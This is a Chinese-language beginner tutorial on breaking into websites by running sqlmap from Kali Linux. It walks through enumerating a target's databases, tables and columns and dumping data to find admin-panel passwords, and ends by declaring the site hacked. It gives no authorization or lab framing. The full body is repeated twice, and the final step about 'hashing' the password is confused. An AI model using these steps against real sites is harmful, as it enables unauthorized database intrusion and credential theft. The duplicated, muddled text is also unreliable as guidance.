首先,您应该从 Microsoft Store 下载“Kali Linux”。
然后打开 Kali Linux 并进行设置。(如果它要求输入“sudo 密码”,请输入您不会忘记的密码)
之后您将看到如下屏幕:
输入:
cd Desktop
sudo apt install python3
sudo apt install git
sudo apt update
sudo apt upgrade
(如果询问“是否要继续?”等问题,请按 Y)
现在我们的终端已准备就绪。
输入:
git clone GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
cd sqlmap
现在我们在 sqlmap 文件夹中。
输入:
python3 sqlmap.py -u(带有 sql 注入的站点)--dbs
(每次当系统询问“是否要继续?”[Y/n] 等问题时,请按 Y
一段时间后,sqlmap 将为我们提供站点数据库。
您将看到如下屏幕:
我们不会使用 information_schema 数据库,因此我们将输入其他数据库名称
(每个站点都有 information_schema 数据库)
类型:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)--tables
sqlmap 将为我们提供数据库的表
您将看到如下屏幕:
现在您必须猜测哪个表包含管理面板信息
输入:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)-T(表名称)--column
sqlmap 将为您提供数据库表的列
您将看到如下屏幕:
现在我们必须转储列数据,因此请选择您认为管理面板信息可能位于的列
类型:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)-T(表名称)-C(列名称)-dump
sqlmap 将为您转储数据
您将看到如下屏幕:
所用站点没有管理面板,因此我找不到任何管理面板密码或其他信息。但如果找到了,您所要做的就是找到站点管理面板并对密码进行哈希处理。然后您就黑掉了站点!
然后打开 Kali Linux 并进行设置。(如果它要求输入“sudo 密码”,请输入您不会忘记的密码)
之后您将看到如下屏幕:
输入:
cd Desktop
sudo apt install python3
sudo apt install git
sudo apt update
sudo apt upgrade
(如果询问“是否要继续?”等问题,请按 Y)
现在我们的终端已准备就绪。
输入:
git clone GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
cd sqlmap
现在我们在 sqlmap 文件夹中。
输入:
python3 sqlmap.py -u(带有 sql 注入的站点)--dbs
(每次当系统询问“是否要继续?”[Y/n] 等问题时,请按 Y
一段时间后,sqlmap 将为我们提供站点数据库。
您将看到如下屏幕:
我们不会使用 information_schema 数据库,因此我们将输入其他数据库名称
(每个站点都有 information_schema 数据库)
类型:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)--tables
sqlmap 将为我们提供数据库的表
您将看到如下屏幕:
现在您必须猜测哪个表包含管理面板信息
输入:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)-T(表名称)--column
sqlmap 将为您提供数据库表的列
您将看到如下屏幕:
现在我们必须转储列数据,因此请选择您认为管理面板信息可能位于的列
类型:
python3 sqlmap.py -u(带有 sql 注入的站点)-D(数据库名称)-T(表名称)-C(列名称)-dump
sqlmap 将为您转储数据
您将看到如下屏幕:
所用站点没有管理面板,因此我找不到任何管理面板密码或其他信息。但如果找到了,您所要做的就是找到站点管理面板并对密码进行哈希处理。然后您就黑掉了站点!
